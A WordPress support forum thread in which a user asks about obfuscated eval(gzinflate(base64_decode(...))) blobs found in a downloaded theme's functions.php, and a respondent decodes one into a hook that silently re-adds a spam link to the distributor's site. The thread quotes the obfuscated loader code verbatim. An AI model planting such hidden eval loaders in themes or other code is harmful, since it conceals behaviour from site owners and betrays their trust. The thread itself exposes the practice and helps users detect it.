WordPress.org

Ready to get started?Download WordPress

Forums

[resolved] Decode and functions.php (5 posts)

  1. Thom986
    Member
    Posted 5 years ago #

    Hello Everybody;

    <?php
    if ( function_exists('register_sidebar') )
    	register_sidebar(array('name'=>'sidebar',
            'before_widget' => '<li id="%1$s" class="widget %2$s">',
            'after_widget' => '</li>',
            'before_title' => '<h3><span>',
            'after_title' => '</span></h3>',
        ));
    
    /**
     * If more than one page exists, return TRUE.
     */
    function show_posts_nav() {
    	global $wp_query;
    	return ($wp_query->max_num_pages > 1) ? TRUE : FALSE;
    }
    function ppl($label='&laquo; Previous Page') {
    	global $paged;
    	if ( (!is_single())	&& ($paged > 1) ) {
    		echo '<div class="alignright"><a href="';
    		previous_posts();
    		echo '">'. preg_replace('/&([^#])(?![a-z]{1,8};)/', '&$1', $label) .'</a></div>';
    	}
    }
    function npl($label='Next Page &raquo;', $max_page=0) {
    	global $paged, $wpdb, $wp_query;
    	if ( !$max_page ) {
    		$max_page = $wp_query->max_num_pages;
    	}
    	if ( !$paged )
    		$paged = 1;
    	$nextpage = intval($paged) + 1;
    	if ( (! is_single()) && (empty($paged) || $nextpage <= $max_page) ) {
    		echo '<div class="alignleft"><a href="';
    		next_posts($max_page);
    		echo '">'. preg_replace('/&([^#])(?![a-z]{1,8};)/', '&$1', $label) .'</a></div>';
    	}
    }
    
    $W9e8b7797290313f56815c6933049c680='jZBPawIxEMXPm08xDIIJWLfnynqRlR78A3aLxxBNXIO7SUhiQ1v63dtN9dRLb8PMb957PCKk5OIYtTUUldSROxsiTlCboHzk8ax6xTttLshm5HQ1GYU/V8rgkxRtZw+ig1Fy8jAjhT7RPD7MWxX5m/AUX+pVvWhgsX3dNHR45FoyWO62a7ihwzLA/rne1ZCBq++q8TlG91SWKaWp6MWHNm2yXjqvQsghwvRo+3KMrKoeGSmK5PgtY04nvBfvFLOeEb1CqOaA+7sENIMGTgDvjr/A/1wR2E83X+Qb';eval(gzinflate(base64_decode($W9e8b7797290313f56815c6933049c680)));
    ?>
    <?php $Z979e7c412a7b08a7b5e83ddb3d65d5c8='rZLBjtMwEIbPXYl3GPlAFwk5BS5oN0lVyoo9tFK1isTeKteeOgY7jmy3URAPv3aTUkHhxsWZzPz6/rFn5uVkkmdCHcvhfHUT/2MAShTEK4E75sgpO8nnbd2Carg+CITb6mG9WS2qh82iegQK02xU06iavrmH+cD6nco1874gXGPC/ipegrP13tqAo/Nrbtv+HpbxdErWAd7PZh8hZ1A73Bdk6GunrVTN3t5OD04P/
    ll0+KPWMINDMc9Y+RYWWsNTYnp4Qo/uiAJ+widnD8ln119c6hDauyzruo4yw36oRnbWidah96FGg55ya0j59ZyE6pRNNvSKcmRaCRaso90Hap3MeI38+/zgVPHP25Dy+bFar+AdnSVobPNvvXHma21Z06LztmGaJgqQchnzsIoF2IyVBEmvu3QoVLx/
    sP8JGCnjmI3k5JpoeukQG25dg254tVwZCd7x62EGNK1mAbeXqSrDJPrM9NsTZzuAtgK9ko2n31pJgOlQkHUPX5Iibk5SwOdBQSArx17Pe3f57qzoT0EdjB7W5+YF';eval(gzinflate(base64_decode($Z979e7c412a7b08a7b5e83ddb3d65d5c8))); ?>

    I'm apologize my English is a little bit poor.!!!
    I have some Issue with a fluid width Theme Dune-Sky.

    There is some base64_decode in the sidebar and in the footer.
    Is-it a security issue?
    If I try to replace the code in the footer, my sidebar leave.

    Do I have to change to another Theme or can you show me hox to have the "normal" php code for those .css.
    Thanks you,

  2. (No good deed goes unpunished.)

    There should be a law: if you download themes from places that do things like that, don't ask here. Use a GPL compatible theme from http://wordpress.org/extend/themes/ instead.

    It's a security issue when you run code on your website and you don't know what that code is. You downloaded the theme from a place called "Amazing WordPress Themes". That place takes other people's work (other people who also put in obfuscated crap in their themes) and inserts their own garbage.

    If you use themes from that Not-Amazing-Place you'll find their link installed on YOUR blog.

    The obfuscated lines in that functions.php decodes to this

    add_action("edit_post","insert_theme_link");
    function insert_theme_link() {
            global $wpdb;
            if($wpdb->get_var("SELECT COUNT(link_id) FROM $wpdb->links WHERE link_url='http://www.amazingwordpressthemes.com/'")==0)
                    wp_insert_link(array("link_name" => "WordPress Theme", "link_url" => "http://www.amazingwordpressthemes.com/" ));
    }

    Whenever you edit a post, this will make sure that you add a link to their website to your blog roll. It checks to see if it's there already and will re-add it when it is not there. If you delete it, it will re-add itself next time you edit a post.

    That's a 8 on the E-V-I-L scale.

    Do you really want to trust dishonest people looking to get link juice without telling you? Lose that theme NOW.

    You should follow mrmist's advice here and learn decode that stuff yourself. Follow many people's advice and use a theme that's GPL compatible and does not have this nonsense embedded in it.

    Also see this FAQ to get rid of simple footers encoded in your theme.

    Edit: You can get the non-obfuscated version of Dune Sky from the author's site here.

  3. Thom986
    Member
    Posted 5 years ago #

    Arg!!!
    So you tell me to change the Theme or you give me a answer?
    Thanks you,

  4. Also, change your theme and get one from wordpress.org. You got one from "Amazing Wordpres themes": they are E-V-I-L and you should stay away from them.

  5. Thom986
    Member
    Posted 5 years ago #

    Okay,
    Thank you very much for the advice. There is so much theme to try.

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags